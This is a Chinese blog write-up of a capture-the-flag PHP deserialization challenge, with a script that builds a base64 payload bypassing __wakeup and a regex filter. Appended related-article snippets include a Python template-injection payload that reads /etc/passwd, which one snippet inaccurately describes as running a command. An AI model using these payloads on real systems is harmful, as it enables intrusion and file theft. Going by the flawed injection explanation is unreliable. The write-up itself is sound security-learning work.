攻防世界-web-Web_php_unserialize

最新推荐文章于 2024-02-21 23:05:16 发布
最新推荐文章于 2024-02-21 23:05:16 发布
阅读量683 收藏 2
点赞数 1
分类专栏: 安全 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuh2333/article/details/130918392
版权

1. 题目描述:查看以下代码,获取flag 

2. 思路分析

从代码中不难看出,这里共有三个地方需要绕过

2.1  __wakeup函数:若在对象的魔法函数中存在的__wakeup方法,那么之后再调用 unserilize() 方法进行反序列化之前则会先调用__wakeup方法,但是序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行,因此这里调大对象属性的个数即可。

2.2 base64编码:这个简单,进行base64加密即可

2.3 正则表达式绕过:这里不允许存在O:数字或者o:数组=字的字符,这个网上找资料,在数字前面加上+即可绕过

3. 获取flag

我们先绕过wakeup,将Demo对象序列化后,得到的字符串是这样的:

O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}

根据以上分析,我们将Demo后门的1改为2即可绕过__wakeup函数,O:4改为O:+4即可绕过正则,再进行base64编码即可(这里注意一定要再代码中处理,线上以及一些工具上进行base64和php代码中进行base64获取到的结果不一样)

详细代码如下:

<?php
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
$str = serialize(new Demo("fl4g.php"));
// 绕过正则
$str = str_replace('O:4', 'O:+4', $str);
// 绕过wakeup函数
$str = str_replace(':1:', ':2:', $str);
// 进行base64编码
print(base64_encode($str));
?>

执行以上代码,得到可以绕过的字符串为:TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

再构造如下请求即可获取到flag:

总结:较为综合的一道题,考察多个绕过点,包括wakeup,正则,以及base64加密。 

wuh2333
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web_php_unserialize(攻防世界
m0_70819573的博客
02-21 350
PHP5 < 5.6.25, PHP7 < 7.0.10 的版本存在wakeup的漏洞。当反序列化中object的个数和之前的个数不等时,wakeup就会被绕过。2.主要有两个可绕过的点,preg_match和_wake up的绕过。(2)preg_match绕过。(1)_wake up的绕过。1.打开环境,审计代码。
攻防世界Web_php_unserialize(超详细WP)
金 帛的博客
03-02 3206
攻防世界WP
攻防世界Web_php_unserialize
m0_74979597的博客
09-21 288
这里为什么过滤的是:‘o:数字’和‘c:数字’呢而且不区分大小写;因为serialize() 的参数为 object , 参数类型有对象 " O " , 序列化字符串的格式为 参数格式:参数名长度 , " O:4 " 字符串会被过滤;对象的属性个数有关,如果序列化后的字符串中表示属性个数的数字与真实属性个数一致,那么i就调用__wakeup()函数 ,不一致就ok了;str_replace('O:4', 'O:+4',$C) 代替函数,冲字符串y中寻找'O:4',并替换;从题目:知道反序列化;
攻防世界——Web_php_unserialize
weixin_73942557的博客
10-30 179
访问网页以后首先显示这段源码,分析一下代码结构,包含一个类。里面包含了 三个魔术方法:__construct\__destruct\__wakeup 后面的判断中包含了isset魔术方法 ,base64_decode解密,正则表达式判断。 那么现在来思考如何绕过 1、@unserialize($var); @符号抑制了错误输出,所以无法通过这里进行信息获取 2、当调用这个脚本时会触发__wakeup魔术方法,需要对它进行绕过 那么我们通过改变让这个参数大于后面的index.php文件 $f
chrome-unserialize-php-crx插件
04-02
谢谢: http://extension sizr.com. https://github.com/bd808/php-unserialize-js. http://locutus.io/php/var_export. github:https://github.com/vicksonzero/chrome-unserialize-php. 更新1.1.0. - 固定var...
php中magic_quotes_gpc对unserialize的影响分析
10-25
主要介绍了php中magic_quotes_gpc对unserialize的影响,以实例的形式分析了magic_quotes_gpc安全过滤对unserialize造成的影响以及对此的解决方法,非常具有实用价值,需要的朋友可以参考下
信息安全_数据安全_9_ZN2018_WV_-_PHP_unserialize.pdf
08-21
在本文中,我们将深入探讨与“信息安全”和“数据安全”相关的主题,特别是关于PHP `unserialize`函数的安全性问题。`unserialize`是PHP的一个内置函数,它用于从存储的表示形式创建PHP值。然而,这个功能在不适当...
phpunserialize返回false的解决方法
10-25
主要介绍了phpunserialize返回false的解决方法,是PHP程序设计中非常经典的问题,需要的朋友可以参考下
攻防世界Web_php_unserializeweb进阶)
my_name_is_sy的博客
06-29 426
考点: 1、构造函数与析构函数和__wekeup魔术方法。 2、php如何进行序列化与反序列化的方法。 3、序列化私有变量时的一些细节
web | CTF】攻防世界 Web_php_unserialize
最新发布
weixin_46301214的博客
02-21 964
变量名:Demofile 变成 \00Demo\00, 字符个数+2就行:s:10:"\00Demo\00file"大概意思应该是当反序列化的 属性变量数 大于 当前类的属性变量数 的时候,就什么安全性因素,就不触发。天命:这条反序列化题目也是比较特别,里面的漏洞知识点,在现在的php都被修复了。【绕过点二】绕过 __wakeup函数,把反序列化中的内容数量,从1改成2即可。多一个+号(具体原理也不清楚,反正当是刷经验了,上古版本的php才有的漏洞)既不简单,也不难,我也学了几天才算比较掌握。
CTF笔记 攻防世界Web_php_unserialize
qq_51248658的博客
10-08 311
做过几次反序列化题目,但都是看wp写出来的,也没有记住,所以记一下笔记。小白理解,有不对的地方,还请大佬们指出。通过代码审计进行利用反序列化漏洞(遇到不懂函数要自己去查),然后需要自己进行实例化得到序列化结果,需要多练。
[渗透测试笔记] 14.php反序列化及利用原理
H4ppyD0g的博客
09-30 665
php序列化与反序列化 php序列化就是将复杂的数据类型(比如说数组,字典,或者一个对象)转换为字符串,方便传输或者存库等操作,并且之后还能后恢复成原来的数据类型的过程。这样可以在不用这个数据的时候让它占用尽可能少的空间。 要注意的是,序列化只是对他的变量进行序列化,类中的函数是不会参与进来的。 php序列化与反序列化的函数 serialize() 用于序列化对象或数组,并返回一个字符串。序列化对象后,可以很方便的将它传递给其他需要它的地方,且其类型和结构不会改变。 unseriali
攻防世界web进阶_Web_php_unserialize
shayebudon的博客
12-11 2096
查看代码 首先定义了一个Demo类, 有一个注释,提醒我们flag在fl4g.PHP中, Demo中的_destruct如果Demo类被销毁,那么就会高亮显示file所指向的文件的内容 _wakeup当进行反序列化时 自动执行所以要绕过_wakeup 变量var的传入 首先进行base64加密 然后preg_match匹配函数 如果匹配上 就“stop hacking” 否则unserialize($var) preg_match('/[oc]:\d+:/i', $v...
CTF攻防世界--web题的wp
weixin_43803070的博客
05-18 8333
Linux的系统光盘,当然想到了在Linux下进行挂载了。 打开虚拟机: root@kali:~# strings '/root/桌面/linux' | grep flag //strings - 显示文件中的可打印字符 strings 一般用来查看非文本文件的内容. root@kali:~# sudo mount '/root/桌面/linux' /mnt //将文件挂载到/...
攻防世界web高手进阶区 Web_php_unserialize
weixin_61835841的博客
04-20 931
有错请各位大佬指正 文章目录 工具 分析 操作 工具 1.火狐 2.phpstudy 分析 本题主要考察的知识点: 1.__construct():当对象创建(new)时会自动调用。将传入的 $file 赋值给本地的私有方法 $file 2.unserialize() 时是不会自动调用的。(构造函数) 3.__destruct():当对象被销毁时会自动调用。(析构函数) 4.__wakeup():unserialize() 时.
攻防世界web_php_unserialize
weixin_52268949的博客
02-06 674
web_php_unserialize 进入环境给出源码 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); }
攻防世界——web高手进阶区题解
热门推荐
小锤队长的博客
10-01 2万+
目录 1,cat (Django,cURL漏洞) 2,ics-05(XCTF 4th-CyberEarth)(文件包含 + preg_replace函数漏洞) 3,ics-06(爆破id) 4,lottery(.git文件泄露) 5,NewsCenter(sql注入) 6,mfv(.git文件泄露 + php审计+ 命令执行) 7,Training-WWW-Robots(robo...
攻防世界web进阶区Web_php_unserialize
gongjingege的博客
07-21 419
打开链接后,源码审计 1,unserialize时,_wakeup()的绕过 //只需要令序列化字符串中标识变量数量的值大于实 际变量 2,绕过preg_match正则,因为正则会过滤掉序列化开头的字母O //使用+可以绕过preg_match() 正则匹配,O:4改成O:+4 这里参考了大佬的反序列化代码 因为题目还要求base64解码再赋值给var传参 所以运行一下后构造payload payload: /index.php?var=TzorNDoiRGVtbyI6Mjp7czoxM
web python template injection_攻防世界-Web_python_template_injection详解
05-26
Web Python Template Injection 是一种常见的 Web 漏洞类型,通常缩写为 SSTI(Server Side Template Injection)。该漏洞是由于 Web 应用程序未正确处理用户输入导致的,攻击者可以通过构造恶意输入来执行任意代码或获取敏感信息。 Python 作为一种流行的 Web 开发语言,广泛应用于 Web 应用程序中。Python Web 框架(如 Flask、Django 等)通常使用模板引擎来生成动态内容。在模板引擎中,可以使用变量、表达式、条件语句、循环语句等功能来生成动态内容。然而,如果在模板引擎中直接使用用户输入作为变量或表达式的一部分,而没有对用户输入进行适当的验证和过滤,就可能导致模板注入漏洞。 例如,在 Flask 应用程序中,可以使用 Jinja2 模板引擎来生成动态内容。如果在模板中使用了用户输入的变量,攻击者可以构造恶意输入来执行任意代码。例如,以下代码中的 name 变量可能是用户输入的: ```python from flask import Flask, render_template, request app = Flask(__name__) @app.route('/') def index(): name = request.args.get('name', '') return render_template('index.html', name=name) if __name__ == '__main__': app.run(debug=True) ``` 在 index.html 中,可以使用 {{ name }} 来显示用户输入的 name 变量。如果攻击者在 name 中注入了模板代码,就可能导致模板注入漏洞。例如,攻击者可以构造如下的输入: ``` {{ ''.__class__.__mro__[1].__subclasses__()[414]('/etc/passwd').read() }} ``` 这段代码在模板引擎中会被解释为调用 Python 的 subprocess.Popen 函数执行命令 /etc/passwd,并读取其输出。攻击者可以通过这种方式执行任意代码,获取敏感信息或者直接控制服务器。 为了防止 SSTI 漏洞,开发人员应该对用户输入进行严格的验证和过滤,避免在模板引擎中直接使用用户输入作为变量或表达式的一部分。可以使用 Python 的安全模板引擎(如 jinja2-sandbox、jinja2-timeout 等)来限制模板执行的权限,或者使用模板引擎提供的安全过滤器(如 escape、safe 等)来过滤用户输入。此外,还应该及时更新 Web 应用程序和相关组件,以避免已知的漏洞攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值